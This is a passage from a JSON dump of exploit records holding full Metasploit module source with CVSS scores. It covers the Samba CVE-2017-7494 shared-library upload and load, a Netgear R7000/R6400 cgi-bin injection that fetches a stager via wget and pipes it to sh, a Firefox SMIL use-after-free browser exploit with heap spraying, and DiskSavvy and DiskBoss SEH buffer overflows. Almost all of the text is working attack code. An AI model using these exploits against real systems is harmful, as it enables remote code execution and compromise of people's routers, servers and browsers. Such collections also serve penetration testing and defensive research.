[\"\"]\n stuff.each_pair do |entry,entry_attr|\n next if %W{. ..}.include?(entry)\n next unless entry_attr['type'] == 'D'\n directories << entry\n end\n\n return directories\n\n rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e\n vprint_error(\"Enum #{share}: #{e}\")\n return nil\n\n ensure\n simple.disconnect(\"\\\\\\\\#{rhost}\\\\#{share}\")\n end\n end\n\n # Determine whether a directory in a share is writeable\n def verify_writeable_directory(share, directory=\"\")\n begin\n simple.connect(\"\\\\\\\\#{rhost}\\\\#{share}\")\n\n random_filename = Rex::Text.rand_text_alpha(5)+\".txt\"\n filename = directory.length == 0 ? \"\\\\#{random_filename}\" : \"\\\\#{directory}\\\\#{random_filename}\"\n\n wfd = simple.open(filename, 'rwct')\n wfd << Rex::Text.rand_text_alpha(8)\n wfd.close\n\n simple.delete(filename)\n return true\n\n rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e\n vprint_error(\"Write #{share}#{filename}: #{e}\")\n return false\n\n ensure\n simple.disconnect(\"\\\\\\\\#{rhost}\\\\#{share}\")\n end\n end\n\n # Call NetShareGetInfo to retrieve the server-side path\n def find_share_path\n share_info = smb_netsharegetinfo(@share)\n share_info[:path].gsub(\"\\\\\", \"/\").sub(/^.*:/, '')\n end\n\n # Crawl top-level directories and test for writeable\n def find_writeable_path(share)\n subdirs = enumerate_directories(share)\n return unless subdirs\n\n if datastore['SMB_FOLDER'].to_s.length > 0\n subdirs.unshift(datastore['SMB_FOLDER'])\n end\n\n subdirs.each do |subdir|\n next unless verify_writeable_directory(share, subdir)\n return subdir\n end\n\n nil\n end\n\n # Locate a writeable directory across identified shares\n def find_writeable_share_path\n @path = nil\n share_info = smb_netshareenumall\n if datastore['SMB_SHARE_NAME'].to_s.length > 0\n share_info.unshift [datastore['SMB_SHARE_NAME'], 'DISK', '']\n end\n\n share_info.each do |share|\n next if share.first.upcase == 'IPC$'\n found = find_writeable_path(share.first)\n next unless found\n @share = share.first\n @path = found\n break\n end\n end\n\n # Locate a writeable share\n def find_writeable\n find_writeable_share_path\n unless @share && @path\n print_error(\"No suitable share and path were found, try setting SMB_SHARE_NAME and SMB_FOLDER\")\n fail_with(Failure::NoTarget, \"No matching target\")\n end\n print_status(\"Using location \\\\\\\\#{rhost}\\\\#{@share}\\\\#{@path} for the path\")\n end\n\n # Store the wrapped payload into the writeable share\n def upload_payload(wrapped_payload)\n begin\n self.simple.connect(\"\\\\\\\\#{rhost}\\\\#{@share}\")\n\n random_filename = Rex::Text.rand_text_alpha(8)+\".so\"\n filename = @path.length == 0 ? \"\\\\#{random_filename}\" : \"\\\\#{@path}\\\\#{random_filename}\"\n\n wfd = simple.open(filename, 'rwct')\n wfd << wrapped_payload\n wfd.close\n\n @payload_name = random_filename\n\n rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e\n print_error(\"Write #{@share}#{filename}: #{e}\")\n return false\n\n ensure\n simple.disconnect(\"\\\\\\\\#{rhost}\\\\#{@share}\")\n end\n\n print_status(\"Uploaded payload to \\\\\\\\#{rhost}\\\\#{@share}#{filename}\")\n return true\n end\n\n # Try both pipe open formats in order to load the uploaded shared library\n def trigger_payload\n\n target = [@share_path, @path, @payload_name].join(\"/\").gsub(/\\/+/, '/')\n [\n \"\\\\\\\\PIPE\\\\\" + target,\n target\n ].each do |tpath|\n\n print_status(\"Loading the payload from server-side path #{target} using #{tpath}...\")\n\n smb_connect\n\n # Try to execute the shared library from the share\n begin\n simple.client.create_pipe(tpath)\n probe_module_path(tpath)\n\n rescue Rex::StreamClosedError, Rex::Proto::SMB::Exceptions::NoReply, ::Timeout::Error, ::EOFError\n # Common errors we can safely ignore\n\n rescue Rex::Proto::SMB::Exceptions::ErrorCode => e\n\n # Look for STATUS_OBJECT_PATH_INVALID indicating our interact payload loaded\n if e.error_code == 0xc0000039\n print_good(\"Probe response indicates the interactive payload was loaded...\")\n\n smb_shell = self.sock\n self.sock = nil\n remove_socket(sock)\n handler(smb_shell)\n return true\n else\n print_error(\" >> Failed to load #{e.error_name}\")\n end\n end\n\n disconnect\n\n end\n\n false\n end\n\n # Use fancy payload wrappers to make exploitation a joyously lazy exercise\n def cycle_possible_payloads\n template_base = ::File.join(Msf::Config.data_directory, \"exploits\", \"CVE-2017-7494\")\n template_list = []\n template_type = nil\n template_arch = nil\n\n # Handle the generic command types first\n if target.arch.include?(ARCH_CMD)\n template_type = target['Interact'] ? 'findsock' : 'system'\n\n all_architectures = @@payload_arch_mappings.values.flatten.uniq\n\n # Include our bonus architectures for the interact payload\n if target['Interact']\n @@payload_arch_bonus.each do |t_arch|\n all_architectures << t_arch\n end\n end\n\n # Prioritize the most common architectures first\n %W{ x86_64 x86 armel armhf mips mipsel }.each do |t_arch|\n template_list << all_architectures.delete(t_arch)\n end\n\n # Queue up the rest for later\n all_architectures.each do |t_arch|\n template_list << t_arch\n end\n\n # Handle the specific architecture targets next\n else\n template_type = 'shellcode'\n target.arch.each do |t_name|\n @@payload_arch_mappings[t_name].each do |t_arch|\n template_list << t_arch\n end\n end\n end\n\n # Remove any duplicates that mau have snuck in\n template_list.uniq!\n\n # Cycle through each top-level platform we know about\n @@payload_platforms.each do |t_plat|\n\n # Cycle through each template and yield\n template_list.each do |t_arch|\n\n\n wrapper_path = ::File.join(template_base, \"samba-root-#{template_type}-#{t_plat}-#{t_arch}.so.gz\")\n next unless ::File.exists?(wrapper_path)\n\n data = ''\n ::File.open(wrapper_path, \"rb\") do |fd|\n data = Rex::Text.ungzip(fd.read)\n end\n\n pidx = data.index('PAYLOAD')\n if pidx\n data[pidx, payload.encoded.length] = payload.encoded\n end\n\n vprint_status(\"Using payload wrapper 'samba-root-#{template_type}-#{t_arch}'...\")\n yield(data)\n end\n end\n end\n\n # Verify that the payload settings make sense\n def sanity_check\n if target['Interact'] && datastore['PAYLOAD'] != \"cmd/unix/interact\"\n print_error(\"Error: The interactive target is chosen (0) but PAYLOAD is not set to cmd/unix/interact\")\n print_error(\" Please set PAYLOAD to cmd/unix/interact and try this again\")\n print_error(\"\")\n fail_with(Failure::NoTarget, \"Invalid payload chosen for the interactive target\")\n end\n\n if ! target['Interact'] && datastore['PAYLOAD'] == \"cmd/unix/interact\"\n print_error(\"Error: A non-interactive target is chosen but PAYLOAD is set to cmd/unix/interact\")\n print_error(\" Please set a valid PAYLOAD and try this again\")\n print_error(\"\")\n fail_with(Failure::NoTarget, \"Invalid payload chosen for the non-interactive target\")\n end\n end\n\n # Shorthand for connect and login\n def smb_connect\n connect\n smb_login\n end\n\n # Start the shell train\n def exploit\n # Validate settings\n sanity_check\n\n # Setup SMB\n smb_connect\n\n # Find a writeable share\n find_writeable\n\n # Retrieve the server-side path of the share like a boss\n print_status(\"Retrieving the remote path of the share '#{@share}'\")\n @share_path = find_share_path\n print_status(\"Share '#{@share}' has server-side path '#{@share_path}\")\n\n # Disconnect\n disconnect\n\n # Create wrappers for each potential architecture\n cycle_possible_payloads do |wrapped_payload|\n\n # Connect, upload the shared library payload, disconnect\n smb_connect\n upload_payload(wrapped_payload)\n disconnect\n\n # Trigger the payload\n early = trigger_payload\n\n # Cleanup the payload\n begin\n smb_connect\n simple.connect(\"\\\\\\\\#{rhost}\\\\#{@share}\")\n uploaded_path = @path.length == 0 ? \"\\\\#{@payload_name}\" : \"\\\\#{@path}\\\\#{@payload_name}\"\n simple.delete(uploaded_path)\n disconnect\n rescue Rex::StreamClosedError, Rex::Proto::SMB::Exceptions::NoReply, ::Timeout::Error, ::EOFError\n end\n\n # Bail early if our interact payload loaded\n return if early\n end\n end\n\n # A version-based vulnerability check for Samba\n def check\n res = smb_fingerprint\n\n unless res['native_lm'] =~ /Samba ([\\d\\.]+)/\n print_error(\"does not appear to be Samba: #{res['os']} / #{res['native_lm']}\")\n return CheckCode::Safe\n end\n\n samba_version = Gem::Version.new($1.gsub(/\\.$/, ''))\n\n vprint_status(\"Samba version identified as #{samba_version.to_s}\")\n\n if samba_version < Gem::Version.new('3.5.0')\n return CheckCode::Safe\n end\n\n # Patched in 4.4.14\n if samba_version < Gem::Version.new('4.5.0') &&\n samba_version >= Gem::Version.new('4.4.14')\n return CheckCode::Safe\n end\n\n # Patched in 4.5.10\n if samba_version > Gem::Version.new('4.5.0') &&\n samba_version < Gem::Version.new('4.6.0') &&\n samba_version >= Gem::Version.new('4.5.10')\n return CheckCode::Safe\n end\n\n # Patched in 4.6.4\n if samba_version >= Gem::Version.new('4.6.4')\n return CheckCode::Safe\n end\n\n smb_connect\n find_writeable_share_path\n disconnect\n\n if @share.to_s.length == 0\n print_status(\"Samba version #{samba_version.to_s} found, but no writeable share has been identified\")\n return CheckCode::Detected\n end\n\n print_good(\"Samba version #{samba_version.to_s} found with writeable share '#{@share}'\")\n return CheckCode::Appears\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/samba/is_known_pipename.rb"}, {"lastseen": "2019-10-16T13:42:21", "bulletinFamily": "exploit", "description": "This module exploits an arbitrary command injection vulnerability in Netgear R7000 and R6400 router firmware version 1.0.7.2_1.1.93 and possibly earlier.\n", "modified": "2018-08-28T11:12:43", "published": "2017-02-16T03:33:48", "id": "MSF:EXPLOIT/LINUX/HTTP/NETGEAR_R7000_CGIBIN_EXEC", "href": "", "type": "metasploit", "title": "Netgear R7000 and R6400 cgi-bin Command Injection", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => \"Netgear R7000 and R6400 cgi-bin Command Injection\",\n 'Description' => %q{\n This module exploits an arbitrary command injection vulnerability in\n Netgear R7000 and R6400 router firmware version 1.0.7.2_1.1.93 and possibly earlier.\n },\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Author' => ['thecarterb', 'Acew0rm'],\n 'DefaultTarget' => 0,\n 'Privileged' => true,\n 'Arch' => ARCH_ARMLE,\n 'Targets' => [\n [ 'Automatic Target', { } ]\n ],\n 'References' =>\n [\n [ 'EDB', '40889'],\n [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=305'],\n [ 'US-CERT-VU', '582384'],\n [ 'URL', 'http://kb.netgear.com/000036386/CVE-2016-582384'],\n [ 'CVE', '2016-6277']\n ],\n 'DisclosureDate' => 'Dec 06 2016',\n 'DefaultOptions' =>\n {\n 'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'\n }\n ))\n\n register_options(\n [\n Opt::RPORT(80)\n ])\n\n deregister_options('URIPATH')\n end\n\n def scrape(text, start_trig, end_trig)\n text[/#{start_trig}(.*?)#{end_trig}/m, 1]\n end\n\n # Requests the login page which discloses the hardware, if it's an R7000 or R6400, return Detected\n def check\n res = send_request_cgi({'uri'=>'/'})\n if res.nil?\n fail_with(Failure::Unreachable, 'Connection timed out.')\n end\n # Checks for the `WWW-Authenticate` header in the response\n if res.headers[\"WWW-Authenticate\"]\n data = res.to_s\n marker_one = \"Basic realm=\\\"NETGEAR \"\n marker_two = \"\\\"\"\n model = scrape(data, marker_one, marker_two)\n vprint_status(\"Router is a NETGEAR router (#{model})\")\n if model == 'R7000' || model == 'R6400'\n print_good(\"Router may be vulnerable (NETGEAR #{model})\")\n return CheckCode::Detected\n else\n return CheckCode::Safe\n end\n else\n print_error('Router is not a NETGEAR router')\n return CheckCode::Safe\n end\n end\n\n def exploit\n return if check == CheckCode::Safe\n\n @cmdstager = generate_cmdstager(flavor: :wget, 'Path' => '/').join(';')\n\n send_request_cgi(\n 'method' => 'GET',\n 'uri' => \"/cgi-bin/;wget$IFS-O-$IFS'#{srvhost_addr}:#{srvport}'|sh\"\n )\n end\n\n # Return CmdStager on first request, payload on second\n def on_request_uri(cli, request)\n if @cmdstager\n send_response(cli, @cmdstager)\n @cmdstager = nil\n else\n super\n end\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb"}, {"lastseen": "2019-10-16T05:34:59", "bulletinFamily": "exploit", "description": "This module exploits an out-of-bounds indexing/use-after-free condition present in nsSMILTimeContainer::NotifyTimeChange() across numerous versions of Mozilla Firefox on Microsoft Windows.\n", "modified": "2017-07-24T13:26:21", "published": "2017-01-20T17:01:36", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/FIREFOX_SMIL_UAF", "href": "", "type": "metasploit", "title": "Firefox nsSMILTimeContainer::NotifyTimeChange() RCE", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::BrowserExploitServer\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Firefox nsSMILTimeContainer::NotifyTimeChange() RCE\",\n 'Description' => %q{\n This module exploits an out-of-bounds indexing/use-after-free condition present in\n nsSMILTimeContainer::NotifyTimeChange() across numerous versions of Mozilla Firefox\n on Microsoft Windows.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Anonymous Gaijin', # Original research/exploit\n 'William Webb <william_webb[at]rapid7.com>' # Metasploit module\n ],\n 'Platform' => 'win',\n 'BrowserRequirements' =>\n {\n source: /script/i,\n os_name: OperatingSystems::Match::WINDOWS,\n ua_name: HttpClients::FF,\n # Fixed in Firefox 50.0.2\n ua_ver: lambda { |ver| ver.to_i.between?(38, 41) }\n },\n 'Targets' =>\n [\n [ 'Mozilla Firefox 38 to 41',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n }\n ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => \"thread\",\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'References' =>\n [\n [ 'CVE', '2016-9079' ],\n [ 'URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=1321066' ],\n [ 'URL', 'https://www.mozilla.org/en-US/security/advisories/mfsa2016-92/' ]\n ],\n 'DisclosureDate' => \"Nov 30 2016\",\n 'DefaultTarget' => 0\n )\n )\n register_options(\n [\n OptBool.new('UsePostHTML', [ true, 'Rewrite page with arbitrary HTML after successful exploitation. NOTE: if set to true, you should probably rewrite data/exploits/ff_smil_uaf/post.html to something useful!', false ]),\n ], self.class\n )\n end\n\n def exploit_html(cli)\n p = payload.encoded\n arch = Rex::Arch.endian(target.arch)\n payload_final = Rex::Text.to_unescape(p, arch, prefix='\\\\u')\n base_uri = get_module_resource\n\n # stuff that gets adjusted alot during testing\n\n defrag_x = %Q~\n for (var i = 0; i < 0x4000; i++)\n heap80[i] = block80.slice(0)\n ~\n defrag_y = %Q~\n for (var i = 0x4401; i < heap80.length; i++)\n heap80[i] = block80.slice(0)\n ~\n\n js = %Q~\n var worker = new Worker('#{base_uri}/worker.js');\n var svgns = 'http://www.w3.org/2000/svg';\n var heap80 = new Array(0x5000);\n var heap100 = new Array(0x5000);\n var block80 = new ArrayBuffer(0x80);\n var block100 = new ArrayBuffer(0x100);\n var sprayBase = undefined;\n var arrBase = undefined;\n\n var animateX = undefined;\n var containerA = undefined;\n\n var milestone_offset = 0x90;\n\n var $ = function(id) { return document.getElementById(id); }\n\n var heap = function()\n {\n var u32 = new Uint32Array(block80)\n\n u32[4] = arrBase - milestone_offset;\n\n u32[0xa] = arrBase + 0x1000 - milestone_offset;\n\n u32[0x10] = arrBase + 0x2000 - milestone_offset;\n\n var x = document.createElementNS(svgns, 'animate')\n var svg = document.createElementNS(svgns, 'svg')\n\n svg.appendChild(x)\n svg.appendChild(x.cloneNode(true))\n\n for (var i = 0; i < 0x400; i++)\n {\n var node = svg.cloneNode(true);\n node.setAttribute('id', 'svg' + i)\n document.body.appendChild(node);\n }\n #{defrag_x}\n\n for (var i = 0; i < 0x400; i++)\n {\n heap80[i + 0x3000] = block80.slice(0)\n $('svg' + i).appendChild(x.cloneNode(true))\n }\n\n for (var i = 0; i < 0x400; i++)\n {\n $('svg' + i).appendChild(x.cloneNode(true))\n $('svg' + i).appendChild(x.cloneNode(true))\n }\n\n for (var i = 0; i < heap100.length; i++)\n heap100[i] = block100.slice(0)\n\n #{defrag_y}\n\n for (var i = 0x100; i < 0x400; i++)\n $('svg' + i).appendChild(x.cloneNode(true))\n }\n\n var exploit = function()\n {\n heap();\n\n animateX.setAttribute('begin', '59s')\n animateX.setAttribute('begin', '58s')\n animateX.setAttribute('begin', '10s')\n animateX.setAttribute('begin', '9s')\n\n // money shot\n\n containerA.pauseAnimations();\n }\n\n worker.onmessage = function(e)\n {\n worker.onmessage = function(e)\n {\n window.setTimeout(function()\n {\n worker.terminate();\n document.body.innerHTML = '';\n document.getElementsByTagName('head')[0].innerHTML = '';\n document.body.setAttribute('onload', '')\n document.write('<blink>')\n }, 1000);\n }\n\n arrBase = e.data;\n exploit();\n }\n\n\n var idGenerator = function()\n {\n return 'id' + (((1+Math.random())*0x10000)|0).toString(16).substring(1);\n }\n\n\n var craftDOM = function()\n {\n containerA = document.createElementNS(svgns, 'svg')\n var containerB = document.createElementNS(svgns, 'svg');\n\n animateX = document.createElementNS(svgns, 'animate')\n var animateA = document.createElementNS(svgns, 'animate')\n var animateB = document.createElementNS(svgns, 'animate')\n\n var animateC = document.createElementNS(svgns, 'animate')\n\n var idX = idGenerator();\n var idA = idGenerator();\n var idB = idGenerator();\n var idC = idGenerator();\n\n animateX.setAttribute('id', idX);\n animateA.setAttribute('id', idA);\n animateA.setAttribute('end', '50s');\n animateB.setAttribute('id', idB);\n animateB.setAttribute('begin', '60s');\n animateB.setAttribute('end', idC + '.end');\n animateC.setAttribute('id', idC);\n animateC.setAttribute('begin', '10s');\n animateC.setAttribute('end', idA + '.end');\n\n containerA.appendChild(animateX)\n containerA.appendChild(animateA)\n containerA.appendChild(animateB)\n\n containerB.appendChild(animateC)\n\n document.body.appendChild(containerA);\n document.body.appendChild(containerB);\n }\n window.onload = craftDOM;\n ~\n\n # If you want to change the appearance of the landing page, do it here\n\n html = %Q~\n <html>\n <head>\n <meta charset=\"utf-8\"/>\n <script>\n #{js}\n </script>\n </head>\n <body>\n </body>\n </html>\n ~\n\n if datastore['UsePostHTML']\n f = File.open(File.join(Msf::Config.data_directory, \"exploits\", \"firefox_smil_uaf\", \"post.html\"), \"rb\")\n c = f.read\n html = html.gsub(\"<blink>\", c)\n else\n html = html.gsub(\"<blink>\", \"\")\n end\n send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })\n end\n\n def worker_js(cli)\n p = payload.encoded\n arch = Rex::Arch.endian(target.arch)\n payload = Rex::Text.to_unescape(p, arch)\n wt = File.open(File.join(Msf::Config.data_directory, \"exploits\", \"firefox_smil_uaf\", \"worker.js\"), \"rb\")\n c = wt.read\n c = c.gsub(\"INSERTSHELLCODEHEREPLZ\", payload)\n c = c.gsub(\"NOPSGOHERE\", \"\\u9090\")\n send_response(cli, c, { 'Content-Type' => 'application/javascript', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })\n end\n\n def on_request_exploit(cli, request, browser_info)\n print_status(\"Got request: #{request.uri}\")\n print_status(\"From: #{request.headers['User-Agent']}\")\n\n if request.uri =~ /worker\\.js/\n print_status(\"Sending worker thread Javascript ...\")\n worker_js(cli)\n return\n end\n\n if request.uri =~ /index\\.html/ or request.uri =~ /\\//\n\n print_status(\"Sending exploit HTML ...\")\n exploit_html(cli)\n close_client(cli)\n return\n end\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/firefox_smil_uaf.rb"}, {"lastseen": "2019-10-03T11:52:47", "bulletinFamily": "exploit", "description": "This module exploits a stack-based buffer overflow vulnerability in the web interface of DiskSavvy Enterprise v9.1.14 and v9.3.14, caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows XP SP3 and Windows 7 SP1.\n", "modified": "2018-07-12T22:34:52", "published": "2017-01-19T19:34:00", "id": "MSF:EXPLOIT/WINDOWS/HTTP/DISKSAVVY_GET_BOF", "href": "", "type": "metasploit", "title": "DiskSavvy Enterprise GET Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Seh\n include Msf::Exploit::Remote::Egghunter\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'DiskSavvy Enterprise GET Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack-based buffer overflow vulnerability\n in the web interface of DiskSavvy Enterprise v9.1.14 and v9.3.14,\n caused by improper bounds checking of the request path in HTTP GET\n requests sent to the built-in web server. This module has been\n tested successfully on Windows XP SP3 and Windows 7 SP1.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'vportal', # Vulnerability discovery and PoC\n 'Gabor Seljan' # Metasploit module\n ],\n 'References' =>\n [\n ['CVE', '2017-6187'],\n ['EDB', '40869']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread'\n },\n 'Platform' => 'win',\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d\\x20\",\n 'Space' => 500\n },\n 'Targets' =>\n [\n [\n 'Automatic Targeting',\n {\n 'auto' => true\n }\n ],\n [\n 'DiskSavvy Enterprise v9.1.14',\n {\n 'Offset' => 542,\n 'Ret' => 0x101142c0 # POP # POP # RET [libspp.dll]\n }\n ],\n [\n 'DiskSavvy Enterprise v9.3.14',\n {\n 'Offset' => 2478,\n 'Ret' => 0x101142ff # POP # POP # RET [libspp.dll]\n }\n ]\n ],\n 'Privileged' => true,\n 'DisclosureDate' => 'Dec 01 2016',\n 'DefaultTarget' => 0))\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => '/'\n )\n\n if res && res.code == 200\n version = res.body[/Disk Savvy Enterprise v[^<]*/]\n if version\n vprint_status(\"Version detected: #{version}\")\n if version =~ /9\\.(1|3)\\.14/\n return Exploit::CheckCode::Appears\n end\n return Exploit::CheckCode::Detected\n end\n else\n vprint_error('Unable to determine due to a HTTP connection timeout')\n return Exploit::CheckCode::Unknown\n end\n\n Exploit::CheckCode::Safe\n end\n\n def exploit\n mytarget = target\n\n if target['auto']\n mytarget = nil\n\n print_status('Automatically detecting the target...')\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => '/'\n )\n\n if res && res.code == 200\n if res.body =~ /Disk Savvy Enterprise v9\\.1\\.14/\n mytarget = targets[1]\n elsif res.body =~ /Disk Savvy Enterprise v9\\.3\\.14/\n mytarget = targets[2]\n end\n end\n\n if !mytarget\n fail_with(Failure::NoTarget, 'No matching target')\n end\n\n print_status(\"Selected target: #{mytarget.name}\")\n end\n\n eggoptions = {\n checksum: true,\n eggtag: rand_text_alpha(4, payload_badchars)\n }\n\n hunter, egg = generate_egghunter(\n payload.encoded,\n payload_badchars,\n eggoptions\n )\n\n sploit = make_nops(10)\n sploit << egg\n sploit << rand_text_alpha(mytarget['Offset'] - egg.length)\n sploit << generate_seh_record(mytarget.ret)\n sploit << make_nops(8)\n sploit << hunter\n sploit << rand_text_alpha(4500)\n\n print_status('Sending malicious request...')\n\n send_request_cgi(\n 'method' => 'GET',\n 'uri' => sploit\n )\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/disksavvy_get_bof.rb"}, {"lastseen": "2019-10-15T23:47:25", "bulletinFamily": "exploit", "description": "This module exploits a stack-based buffer overflow vulnerability in the web interface of DiskBoss Enterprise v7.5.12, v7.4.28, and v8.2.14, caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows XP SP3 and Windows 7 SP1.\n", "modified": "2017-12-08T16:42:43", "published": "2017-01-07T18:44:38", "id": "MSF:EXPLOIT/WINDOWS/HTTP/DISKBOSS_GET_BOF", "href": "", "type": "metasploit", "title": "DiskBoss Enterprise GET Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Seh\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'DiskBoss Enterprise GET Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack-based buffer overflow vulnerability\n in the web interface of DiskBoss Enterprise v7.5.12, v7.4.28, and v8.2.14,\n caused by improper bounds checking of the request path in HTTP GET\n requests sent to the built-in web server. This module has been\n tested successfully on Windows XP SP3 and Windows 7 SP1.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'vportal', # Vulnerability discovery and PoC\n 'Ahmad Mahfouz', # Vulnerability discovery and PoC\n 'Gabor Seljan', # Metasploit module\n 'Jacob Robles' # Metasploit module\n ],\n 'References' =>\n [\n ['EDB', '40869'],\n ['EDB', '42395']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread'\n },\n 'Platform' => 'win',\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d\\x20\",\n 'Space' => 2000\n },\n 'Targets' =>\n [\n [\n 'Automatic Targeting',\n {\n 'auto' => true\n }\n ],\n [\n 'DiskBoss Enterprise v7.4.28',\n {\n 'Offset' => 2471,\n 'Ret' => 0x1004605c # ADD ESP,0x68 # RETN [libpal.dll]\n }\n ],\n [\n 'DiskBoss Enterprise v7.5.12',\n {\n 'Offset' => 2471,\n 'Ret' => 0x100461da # ADD ESP,0x68 # RETN [libpal.dll]\n }\n ],\n [\n 'DiskBoss Enterprise v8.2.14',\n {\n 'Offset' => 2496,\n 'Ret' => 0x1002A8CA # SEH : # POP EDI # POP ESI # RET 04 [libpal.dll]\n }\n ]\n ],\n 'Privileged' => true,\n 'DisclosureDate' => 'Dec 05 2016',\n 'DefaultTarget' => 0))\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => '/'\n )\n\n if res && res.code == 200\n if res.body =~ /DiskBoss Enterprise v(7\\.4\\.28|7\\.5\\.12|8\\.2\\.14)/\n return Exploit::CheckCode::Vulnerable\n elsif res.body =~ /DiskBoss Enterprise/\n return Exploit::CheckCode::Detected\n end\n else\n vprint_error('Unable to determine due to a HTTP connection timeout')\n return Exploit::CheckCode::Unknown\n end\n\n Exploit::CheckCode::Safe\n end\n\n def exploit\n mytarget = target\n\n if target['auto']\n mytarget = nil\n\n print_status('Automatically detecting the target...')\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => '/'\n )\n\n if res && res.code == 200\n if res.body =~ /DiskBoss Enterprise v7\\.4\\.28/\n mytarget = targets[1]\n elsif res.body =~ /DiskBoss Enterprise v7\\.5\\.12/\n mytarget = targets[2]\n elsif res.body =~ /DiskBoss Enterprise v8\\.2\\.14/\n mytarget = targets[3]\n end\n end\n\n if !mytarget\n fail_with(Failure::NoTarget, 'No matching target')\n end\n\n print_status(\"Selected Target: #{mytarget.name}\")\n end\n\n case mytarget\n when targets[1], targets[2]\n sploit = make_nops(21)\n sploit << payload.encoded\n sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)\n sploit << [mytarget.ret].pack('V')\n sploit << rand_text_alpha(2500)\n when targets[3]\n seh = generate_seh_record(mytarget.ret)\n sploit = payload.encoded\n sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)\n sploit[sploit.length, seh.length] = seh\n sploit << make_nops(10)\n sploit << Rex::Arch::X86.jmp(0xffffbf25) # JMP to ShellCode\n sploit << rand_text_alpha(5000 - sploit.length)\n else\n fail_with(Failure::NoTarget, 'No matching target')\n end\n\n send_request_cgi(\n 'method' => 'GET',\n 'uri' => sploit\n )\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/diskboss_get_bof.rb"}]}
